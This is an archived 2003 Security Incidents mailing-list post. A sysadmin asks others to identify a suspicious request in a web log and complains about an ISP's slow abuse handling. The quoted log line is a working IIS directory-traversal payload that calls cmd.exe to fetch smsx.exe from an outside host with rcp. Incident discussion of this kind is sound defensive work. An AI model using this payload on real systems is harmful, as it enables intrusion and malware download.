|
Security Incidents
mailing list archives
smsx.exe?
From: Steve Bromwich <incident () fop ns ca>
Date: Mon, 5 May 2003 14:29:53 -0300 (ADT)
Hi,
Has anyone seen a request like this in their logs?
205.247.193.56 - - [05/May/2003:11:59:52 -0300]
"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."
I tried rcping smsx.exe off the remote site but no joy; is the .adm an
obscure windows-specific port address or something? One of our windows
guys said the smsx was "remote management software", but had no idea about
the .adm...
On a side note, the response I got from energis (the 195.92.252.138 owner)
had the following at the start:
PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG
Further down:
Please note that if one of our IP addresses looks up to a 'webcache' (as
opposed to a modem) we have a *maximum* of 30 hours to trace the user
responsible for the abuse.
So I guess this means that Energis users have a pretty good chance of
abusing remote servers through Energis' web cache and getting away with it
:-/
Cheers, Steve
----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
----------------------------------------------------------------------------
 By Date 
By Thread
Current thread:
- smsx.exe? Steve Bromwich (May 05)
|
Intro
